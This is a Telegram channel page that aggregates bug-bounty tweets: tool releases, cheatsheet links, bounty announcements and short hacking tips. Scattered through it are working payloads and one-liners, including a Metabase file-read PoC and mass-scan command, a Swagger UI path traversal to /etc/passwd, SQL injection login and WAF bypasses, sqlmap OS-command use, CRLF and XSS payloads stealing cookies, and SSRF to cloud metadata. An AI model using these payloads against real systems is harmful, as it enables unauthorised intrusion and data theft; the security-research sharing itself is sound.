Bug Hunting Hub
833 subscribers
16 photos
404 links
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Download Telegram
to view and join the conversation
Opening the main stage of ZeroNights X. Opening new research ideas and new mates. The world has changed, but the reason to meet remains the same.

If you also visited the event, share your impression.
#BugBountyTips of the Day
CSP - the magic of browser security. HD version : https://t.co/IGOXDztLqk Wanna practise it ? Read the thread. 🧵 ⬇️ #infosec #appsec #bugbountytips #bugbounty #zines #hackers #learn365 https://t.co/CEoTa2CzFh
---
Releasing a New Tool "Jira-Lens". It's a Python Based Vulnerability Scanner for JIRA. Fast and Easy to Setup Can Be Added Directly To Your Automation Scripts Go Check It out and leave a⭐️ if u like it #bugbounty #OpenSource #AUTOMATION #cybersecurity https://t.co/MpCDJA5oK8
---
that's what happening when you read good tips and blogs for smart man like @0xAwali Triaged P1 and huge impact #bugbountytip check all the time allowed HTTP method ====> https://t.co/3BHhhf38W2
---
🥳OpenSwap $OSWAP announces strategic partnership with @immunefi. Now offering up to 💎$50,000💎 to anyone 🕵️who finds viable and actionable security vulnerabilities in our codes. Read more: https://t.co/FvrEuy7glt #OpenSwap #bugbounty #DeFi #Immunefi #BSC #Rewards #DEX
#BugBountyTips of the Day
sneakpeek at my next upcoming course this month 95% recording and rendering completed Ultimate Bug Bounty #bugbounty #cybersecurity #pentest #oscp #hacking https://t.co/Q0voG1vtHo
---
Ever want to test an Android app on #bugcrowd? I put together a guide for intercepting Android app traffic with Nox Emulator/Burp and also defeating certificate pinning with Frida - it works on every app I've tried! Now go slay bugs! #bugbountytips https://t.co/TPI6dCVjas
---
Testing Authentication Flaws in Web Application ⚡️ #bugbounty #bugbountytips #hacking #websecurity https://t.co/nQ4AJNOlmQ
---
I bought a new laptop with bug bounties. Thanks to @SynackRedTeam and @Bugcrowd #bugbounty https://t.co/Qw7FMYwL2v
---
0xffsec Handbook 🔗 https://t.co/I1wWZIj6gt #bugbounty #cybersecurity #infosec https://t.co/lLoLeueVXx
---
Subdomain Enumeration Guide 🔗 https://t.co/cKZ1Upd0d1 #bugbounty #cybersecurity #infosec https://t.co/DBCpfPkdrt
#BugBountyTips of the Day
I recommend learning every thing you come across and applying them on bounties, but here are 5 vulnerabilities a beginner can start with:) 1. XSS 2. IDORs 3. Subdomain takeovers 4. CSRFs 5. Sensitive data exposure through Github and Googlr dorks #bugbountytips
---
Ghauri - An Advanced SQL Injection Automation Plugin-In By @SecurityFoster. 💫💫 Latest Acunetix VS Ghauri 🧐🧐 Coded By: @r0oth3x49 🎩 #Cybersecurity #automationtesting #BugBounty #bugbountytips https://t.co/7eNp0TMvK9
---
Whenever you end up on Okta login, click on "Need help signing in" just to see if there is any link to their internal wiki or helpdesk. I ended up on an IT helpdesk which had "Sign Up" enabled and got access to internal docs, passwords & what not. #bugbountytips https://t.co/W6yMm1pJLc
---
~Admin Panel Accessed via sqli #bugbountytips 1- Search for Login panels through @shodanhq with this dork: org:"TARGET" http.title:"login" 2- Bypass login with old way: admin' or 1=1 #BugBounty #bugbountytip #cybersecurity #sqli https://t.co/vKRvnJYwgV
#BugBountyTips of the Day
Best of Web Penetration Testing Credit @sec_r0 #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips https://t.co/zZRqSJS4kq
---
Best of Burpsuite Credit @SecurityZines #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty https://t.co/bCoX0TLuoV
---
I just published my blog: a story of an epic blind remote code execution(RCE) https://t.co/sR4mPoIMZf #bugbounty #bugbountytips #infosec
---
Jira payloads A thread 🧵 #bugbounty #bugbountytips #jira
---
Another XSS/HTMLI at NASA. @ADITYASHENDE17 @impratikdabhi @e11i0t_4lders0n @MrRajputHacker @streetofhacker #bugbounty #bugbountytips #cybersecurity #infosec #XSS #HTMLInjection https://t.co/ewaKTSnS7f
---
I earned a $750 bounty Tips: I never miss dir fuzzing ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.sql,.old,.at,.inc -w path -u https://t.co/Erf2BHQqle -t 5000 #bugbounty #bugbountytips https://t.co/OH6A86Q9QP
---
Prototype Pollution Scanners: 1. PPScan => browser extension for finding websites vulnerable to prototype pollution link: https://t.co/Ox5jVxI1zA 2. ppmap => escalates prototype pollution to xss link: https://t.co/BPc6jhMbsQ check below.. #bugbountytips #bugbountytip
---
Learn the mobile #hacking basics with our resources kit 👇👇👇 #bugbountytips https://t.co/byEH6BaFH9
#BugBountyTips of the Day
Apple'dan totalde $7,500 olmak üzere 2 adet daha ödül kazandım! 🤗 #bugbounty https://t.co/EwzF3bjSQZ
---
Reading Local files using Microsoft Excel, XXE vulnerability and a bit of patience! Share if you found it helpful! https://t.co/kDH9XuaKuI #bugbounty #Pentesting
---
Best of Web Penetration Testing (Part 2) Credit @sec_r0 #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips https://t.co/HyOk0VK7Uf
#BugBountyTips of the Day
Few months ago i was awarded $10,000 from microsoft for finding a security vulnerability on their web application. now the bug has been patched and got the acknowledgment on their HOF :) #bugbounty #cybersecurity #news #microsoft #ethicalhacking #bugbountytips #bounty https://t.co/BCCG7TzP8w
---
Red Team Toolkit 🧰 - An Open-Source Django Offensive Web-App that contains useful offensive tools used in the red-teaming activity. » https://t.co/nl4OewP3f5 #cybersecurity #infosec #security #cyber #informationsecurity #redteam #redteaming #bugbounty #bugbountytips https://t.co/3ZEmmOSpyo
---
Just published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP. https://t.co/lslyFhDmbF #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips
---
Really excited for this Precious gift from GoogleVRP team. Thanks for selecting me. #infosec #googlevrp #bugbounty https://t.co/jVFi2IxgMG
---
Best of Web Penetration Testing Credit @sec_r0 #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips https://t.co/nPepuxs3WR
---
Best of Web Penetration Testing Credit @sec_r0 #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips https://t.co/jq1DnJ34gl
---
There are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : ) #bugbounty https://t.co/FPQTir4bE2
---
which wordlist you use for subdomain brute !!! #bugbountydiscussion #bugbounty #infosec
---
I've pushed a nuclei template to detect this misconfiguration An unauthenticated api endpoint requiring a URL parameter, with insufficient validation that lead to LFI. ( CVE-2021-41277 ). https://t.co/shrTv2gr85 Source : https://t.co/ByzKbMFX8m #bugbounty #bugbountytips 1/2 https://t.co/r72gDHNYWt
---
Best of Web Penetration Testing (Part 3) Credit @hackerscrolls #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips https://t.co/1WuKhFEXMa
#BugBountyTips of the Day
New Feature Alert 🚨 [ --SQLi ] Support #MySQL mod_Security & libinjection bypass [** New **] Have a look : https://t.co/9ZLO4pJsuG $ bash https://t.co/oGQuTKBBAs -u https://domain.tld/secret --SQLi #bugbountytips #bugbountytip #bugbounty #infosec #cloud #cybersecurity https://t.co/RKjXMaF2tw
---
#BugBounty #bugbountytip #infosec - Do you want to get all subdomains of a host, get the open ports of all of them (using IP address deduplication), and check if there's an HTTP service running? Use the set of tools included in the screenshot! Links in the comments. https://t.co/qC0FVQCDzA
---
Password reset token was getting leaked in the forgot password Request itself as well as on other endpoint '/verify/'. 2x bounty.@SynackRedTeam #bugbountytips https://t.co/UYOEXKPAve
---
Best of YouTube Channels for Pentester (Part 3) https://t.co/70lBKdBw16 https://t.co/cRhoJ6D0fC https://t.co/IeZHpjoDjR https://t.co/qQRG02wVHv @rot169 @0xConda @rana__khalil @NahamSec #infosec #cybersecurity #pentesting #oscp #bugbounty
---
El Curso Virtual de Hacking con Kali Linux está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/lsfm4jifRQ https://t.co/pyXzMnVOyv
---
Best of Web Penetration Testing (Part 4) Credit @trbughunters #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip4 https://t.co/6bPVxzGUTI
---
Small to medium size businesses are using WordPress, Learn how to recon and hack WordPress websites in a legal penetration testing environment. #bugbountytips #infosec https://t.co/QpGPHxs7H6
---
API Security Checklist🔥 https://t.co/7tW3yfUsEy #bugbounty #bugbountytips #apisecurity #apipentesting #checklist
---
CVE-2021-41277 MetaBase Arbitrary File Read MetaBase < 0.40.5 1.0.0 <= MetaBase < 1.40.5 https://t.co/TtJHu6lvr1 PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1 #CVE #BugBounty #bugbountytips #infosec #vulnerable
#BugBountyTips of the Day
Yay, I was awarded a $7,500 bounty on @Hacker0x01 ! https://t.co/omBwPCLeT7 #TogetherWeHitHarder with @naglinagli @YahooSecurity and @TheParanoids once again show why they can be the best program to hack on, and are one of the most fair programs around. #BugBounty
---
LFI in #SwaggerUI #bugbountytips #bugbountytip add this payload for your LFI word list /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 #NOTE its not working from browser https://t.co/RKUhGwEmSZ
---
Best of SSRF Cheatsheet Credit @d0nut #infosec #cybersecurity #pentesting #oscp #cheatsheet #burpsuite #bugbounty #bugbountytips #ssrf #vulnerabilities https://t.co/4orqpOIEIQ
---
#bugbountytips #bugbounty #CVE-2021-41277 Metabase Custom GeoJSON Map file inclusion https://domain/api/geojson?url=file:///etc/passwd httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string "root:x:0:0" https://t.co/TnXoIpVvfd
---
I am predicting this to be an excellent #book to add to your 2022 list for #webapp #security and #bugbounty hunting. Thank you Corey Ball for sharing your knowledge on this important topic! #infosec #recon #pentest #api #bugbountytips #websecurity https://t.co/BVFL57rKx1
#BugBountyTips of the Day
Swagger UI LFI Injection. LFI Payload: /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 #bugbounty
---
I was never interested in nuclei. But it looks promising . Worth spending some machine hours for fuzzing, I guess. #BugBounty #nuclei #projectdiscovery https://t.co/r4r4Nci9FE
---
httpx -l URLS.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string "root:x:0:0" #bugbounty #bugbountytips
---
El Curso Virtual de OSINT - Open Source Intelligence está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/gDo2NMXXL5 https://t.co/NYth7vVslt
---
Something my #metabigor can do but I don't think a lot of people know is you can get more root domains that belong to a company by looking at certificate information 👽 https://t.co/zdHGQJHuYV #recon #bugbounty #bugbountytips https://t.co/u4Dn19OY8a
---
#bugbountytips #bugbounty Swagger UI LFI Injection LFI Payload: /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 https://t.co/0qVfmtiluk
#BugBountyTips of the Day
If you are looking for a CHECKLIST for web apps, I guess this is the best one tbh. Try it and learn as much as you can which you don’t know:) great resource! #bugbountytips #bugbounty https://t.co/3ydoe7rdaG
---
I was able to break the @Cloudflare WAF while testing for SQLi by crafting the following payload: %27/**/%256fR/**/50%2521%253D22%253B%2523 [ Explanation will be in replies ] #bugbountytips #bugbountytip #CyberSecurity #CyberSec #infosec #infosecurity
---
Best of Bug Bounty Mindmap (Part 4) Credit @HackerGautam #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip https://t.co/PgQREXQRoG
#BugBountyTips of the Day
“Full account takeover through referral code.” by Mostafa Mamdoh https://t.co/7fJkuCibJg #hacking #bugbounty #infosec
---
Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack https://t.co/zRQ6o4DBNP #BugBounty https://t.co/Am9xH73nLR
---
IDOR Isn't dead :D Check the ID Param in Burp suite history Thanks to @e11i0t_4lders0n @theXSSrat @HemantSolo @th3cyb3rc0p #bugbounty #infosec #idor https://t.co/vNkAvqb5cE
---
CVE-2021-41765 ResourceSpace unauthorized SQL injection ResourceSpace <= 9.5 sqlmap --cookie 'upload_share_active=1' -u " http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql #vulnerability #infosec #BugBounty #bugbountytips
#BugBountyTips of the Day
اذا كنت تبحث عن مستودع #باللغة_العربية عن: - نمذجة التهديدات السيبرانية - اختيار الاختراق - الانظمة والشبكات - أدوات مكافأة الثغرات #bugbounty -الثغرات -مراكز العمليات السيبرانية -OWASP TOP10 -OWASP TOP 10 API -الشهادات الاحترافية تفضل: https://t.co/kIwcBODNam #تحديث:11/2021 https://t.co/e3L5PqdeWR
---
Wanna doing a subs-list-based port scan in your live subs list but nmap cannot doing It's scan because of the: http:// or https:// ? Simply: cat subs.txt | sed 's/^ http\(\|s\):\/\///g' | tee new #BugBounty #bugbountytip #bugbountytips #infosec
---
Bug Bounty Tip :: XSS Filter Bypass Tricks You can use <input type=image> when <img> tag with attribute "onerror" is not allowed #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone https://t.co/q0xT11Gxkz
---
Here's a couple of things worth a try to get an IDOR Comment below if you've other useful tips & techniques. 🧵👇 #bugbounty #bugbountytips #infosec
---
Best of Bug Bounty Mindmap #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip https://t.co/SmcXtT2jG2
---
Best of IDOR Cheastheet Credit https://t.co/lw4XjBfCQk #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #Linux #hacking #ctf #BlueTeam #ITsecurity #ctf #bugbountytips https://t.co/FOjTGoXzS8
#BugBountyTips of the Day
Greetings, I wanted to share a security vulnerability I found recently. OTP bypass with response manipulation. https://t.co/54ZjQN4gU4 #BugBounty #bugbountytips #infosec #cybersecurity
---
Cyber Security Certification Jobs Cheatsheet #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #jobs #cissp https://t.co/1TK9YKp9iQ
---
#bugbountytips If you tried to access /.git folder and got 403 , try to access files after .git like: /config or /logs/HEAD You can test it with multiple hosts via @pdiscoveryio httpx tool : httpx -l subs.txt -path /.git/config --status-code --silent #BugBounty #CyberSecurity https://t.co/lHr9AILFxL
---
Katana- A Python Tool For Google Hacking https://t.co/TwEYDRMzOj #infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #opensource #OSINT #python #google #programming #BugBounty https://t.co/zFf3trJlkJ
---
ℙ𝕖𝕟𝕖𝕥𝕣𝕒𝕥𝕚𝕠𝕟 𝕋𝕖𝕤𝕥𝕚𝕟𝕘 ℂ𝕖𝕣𝕥𝕚𝕗𝕚𝕔𝕒𝕥𝕚𝕠𝕟𝕤 #infosec #cybersecurity #certifications #pentest #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #Linux #hacking #ctf #BlueTeam #ITsecurity #ctf #bugbountytips https://t.co/H4mo6Z1PF2
---
When testing application, if you want to verify potential SQL injection specially for integer value, do not directly do stuff like ' OR 1='1 but do mathematical comparisons. #bugbountytips
---
Introducing a NEW FEATURE in #karma_v2 📢 https://t.co/ExAGaXcjmX [-cveid]: Scan a host/domain for specific #CVE ID for vulnerabilities & #exploit # bash karma_v2 -u OR # git pull #bugbounty #shodan #OSINT #bugbountytips #bugbountytip #Cloud #infosec #cybersecurity https://t.co/m9tYrcjU4Q
---
Best of Penetration testing Certifications #infosec #cybersecurity #pentesting #oscp #cheatsheet #vulnerabilities #informationsecurity #Linux #hacking #ctf #BlueTeam #ITsecurity #ctf #bugbountytips https://t.co/49l9tKcQqH
---
#bugbountytip #bugbounty Command Injection via Obsolete PHPThumb More... https://t.co/FE3c0q8ZL4 https://t.co/9A3X8Q9oO4
---
Was just an Amazing Event @bsidesahmedabad met Amazing people, Now time to say Bye Ahmedabad and Thank you @Bugcrowd #infosec #bugbounty https://t.co/hqdJuTysjp
---
Looking for new domains? #bugbountytips #infosec #bugbounty https://t.co/TwBASeX5Q7
---
📌3 skills you should develop to be good at bug hunting 1⃣ patience: you have to be patient while looking for bugs. #bugbounty #bugbountytips #cybersecurity
#BugBountyTips of the Day
Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using <img> tag with unclosed "src" attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone https://t.co/qVB0vAByIQ
---
MacBook M1 Pro 🔥 #BugBounty https://t.co/wu3hEt5TSE
---
Manually Grepping through JS files have always been a win win to me. #bugbountytips #bugbounty #appsec https://t.co/O7PN9puW5s
---
Best of OSCP Cheatsheet https://t.co/jYFJZWoNw0 https://t.co/ZQFX66HDKQ https://t.co/T7V12gmbjZ https://t.co/SEJdYN3mFs #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips https://t.co/sxwph7PFIc
---
Best of HacktheBox CTF Writeups https://t.co/AIUdoUaDV6 #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #HackTheBox https://t.co/zGjrawECTv
---
This is a curated list by @Hacker0x01 of Burp plugins! ActiveScan++ Autorepeater Burp Autorize Burp BurpSentinel Flow Headless Burp Logger++ WSDL Wizard #cybersecurity #bugbountytips #hacking #webappsec #webhacking #pentesting THREAD 👇
---
I just published Hunting for Bugs in Shopping/Billing Feature. https://t.co/0dxh0umkzw #bugbountytips #infosec #bugbounty
---
uDork - Google Hacking Tool https://t.co/9yepC1MgZu #infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #opensource #webapphacking #bugbounty #google #browser https://t.co/vlpYXS3KRB
#BugBountyTips of the Day
$2250 USD bounty for reporting a security issue Bugs: Information Disclosure and Cloudflare Bypass Reflected XSS Bypass payloads: <svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #bugbountytips https://t.co/Eb8VnA9w01
---
في فعالية ⁦#AtHack المنافسات للفوز في مسابقة تحدّي ⁧#التقط_العلم#CTF و #BugBounty تعال تعرف على هالمسابقتين مع @Yaserious https://t.co/TfVzD3PnB1
---
Best of Wireless Networking Cheatsheet Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp #wireless #WiFi https://t.co/kAnNDopUvC
---
My OSWE Preperation Guide (from 2019 ;-) Note: I made it with this one 😅 #infosec #pentest #bugbounty https://t.co/Jb80wAMhVH https://t.co/VcrG1lp4My
---
P1 X 2 in One SQL Injection RCE Due xp_cmdshell was enabled sqlmap -r request.txt --force-ssl -p pramater --level 5 --risk 2 -dbms="Microsoft SQL Server" --os-cmd="ping https://t.co/wWsuw6X2T5" @GodfatherOrwa thanks for this one #bugbounty https://t.co/EJmkvKf4mn
---
Hi guys, I published a new article on my blog about "How to find an open #Firebase by using #scant3r" it checks for read/write #permission and #brute-forcing on alias #subdomains Link: https://t.co/LyduOKGPf0 #bugbountytips #appsec #bugbountytip https://t.co/8wfi78lxCo
---
Best of Nikto Cheatsheet for OSCP Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/sIVaaxq4SL
---
Best of VIM Cheatsheet #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #vim #programming https://t.co/Blt8vKSpD8
---
Best of CISSP Cheatsheet (Part 2) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/XXlJlS0r7z
---
Best of CISSP Cheatsheet (Part 1) Credit @Comparitech #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #riskmanagement #cissp https://t.co/dfc9ysMWiA
---
#bugbountytips #bugbounty CVE-2021–38314 #WordPress Unauthenticated Sensitive Information Disclosure More.. https://t.co/jjUJfBkehg https://t.co/K3SMCClgoj
---
Highly recommend to go through all the disclosed reports of both @BugBountyHunt3r events. You will get a lot of knowledge and various way of bypass. FirstBlood : https://t.co/LgdOI5mY4P FirstBloodv2 : https://t.co/Rig3v3hAJr #bugbounty #bugbountytips https://t.co/XIpN3EXN4r
#BugBountyTips of the Day
نبارك للباحثين المتميزين بالفوز في تحدي منصة "مكافآت الثغرات" #BugBounty بجوائز مجموعها 300,000 ريال تشمل الفائزين بالمراكز الأولى بالإضافة إلى الفائزين بجوائز التقارير التي تجاوزت 5,000 تقرير رفعت للمنصة ضمن مؤتمر #AtHack https://t.co/l1VCWkZGld
---
مشاعر المتسابقين قبل لحظات من إعلان نتائج منافسات #التقط_العلم #ctf و #BugBounty بعد ثلاث أيام من التحديات المتقدمة، سنعلن الليلة في #AtHack عن الفائزين بجوائز مجموعها 1,000,000 ريال!🔥 https://t.co/otlKnjGZHZ
---
Best certifications for Jobs! #cybersecurity #Pentesting #hacking #hacker #bugbounty https://t.co/N6WvhVFUYK
---
Poem of the Day #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #ITsecurity #bugbountytips #riskmanagement #cissp #linux https://t.co/C24sZtaroC
---
Best of Linux CLI Commands Cheatsheet for OSCP #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #ITsecurity #bugbountytips #riskmanagement #cissp #linux https://t.co/D7kmDahbTf
---
Best of SQLMap Cheatsheet Credit @Comparitech https://t.co/23nqLqL0PJ #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #sqlinjection #ITsecurity #bugbountytips #riskmanagement #cissp #sqlmap https://t.co/eiis4iLL81
#BugBountyTips of the Day
SSRF Tip: -Found an endpoint that returns full URL content, but I couldn't hit anything internal 😢 -DNS rebinding got me the full contents of 169.254.169.254 Used https://t.co/iRx55cs1lJ Set "A" as Google IP Set "B" as Ec2 metadata IP. Copy domain to request #bugbountytips
---
In November, I submitted 107 vulnerabilities to 55 programs on @Hacker0x01 and 269 vulnerabilities to 17 programs on @Bugcrowd. #BugBounty https://t.co/CTKOkFUY72
---
Reflected XSS using CRLF GET /endpoint?url=%0d%0aSet-Cookie:test=test -> header added in response headers GET /endpoint?url=%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html><script>alert(document.cookie)</script><!-- #bugbountytips #BugBounty #synack https://t.co/BfXROpJmq8
---
Best of Red Team Cheatsheet Credit https://t.co/PyvaoQdHyz #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #mitre #cissp #redteam https://t.co/k3qK2oZOFU
---
Best of cURL Cheatsheet #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #mitre #cissp #redteam https://t.co/CnuJinMS6m
---
El Curso Virtual de Hacking con Kali Linux está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/lsfm4jifRQ https://t.co/qufUZV418Y
---
Yayy , @theabrahack and Me got rewarded a bounty of $10,000 on @Hacker0x01 , It’s been amazing collaborating with him and looking for more future collaborations #BugBounty
---
Best of MITRE ATT&CK Cheatsheet (Part 2) Credit @CyberRaiju #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #mitre #cissp #redteam https://t.co/EtQJY2RCJO
---
Best of Windows ATT&CK Logging Cheat Sheet Credit https://t.co/bqJfLmLzzM #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #ITsecurity #bugbountytips #mitre #cissp https://t.co/S75kChjJVt
#BugBountyTips of the Day
Hey hunters! Here's my Recon Methodology, hope you like: https://t.co/45aVdGVO56 #BugBounty #bugbountytips #bugbountytip #bughunting #infosec #CyberSecurity #CyberSec #infosecurity https://t.co/AyRbaxupOU
---
The best article for SQL INJECTION WAF bypass. https://t.co/SLDCjpAyQC #bugbountytip
---
Intel kiest @intigriti als #bugbounty provider! Intel’s bug bounty programma betaalde afgelopen jaren miljoenen uit aan ethische hackers wereldwijd, met beloningen tot meer dan $100,000 per bug. Meer nieuws later! 😎 https://t.co/00kBkecvmA
---
Got my first salary credited today! #bugbounty really changed my life :) Thanks to everyone who always supported me :)
---
API Testing MindMap 😍 https://t.co/tnJnywtHI0 #bugbountytips #infosec
#BugBountyTips of the Day
Here's my new write-up about my SSRF in @yandexcom, check it out 🥳 https://t.co/xmP7T9dHyQ #BugBounty #bugbountytips #bugbountytip #bughunting #writeup #cybersecurity #infosec #infosecurity
---
Just Updated my Subdomain Enumeration Guide with new techniques, fixes, etc. Have a look 😊 Boost your Recon game !!🚀🚀 https://t.co/MhzM6poLh9 #bugbounty #infosec https://t.co/o9uZjBjitZ
---
#bugbountytips #bugbounty #Firebase How to Exploit Public Firebase Realtime Database using REST API 1. What is Firebase - Realtime Database 2. How do we know the application use firebase 3. How to exploit the Firebase Database 4. Recent Attack More.. https://t.co/T7M602tvr0 https://t.co/O5TJNzY6fp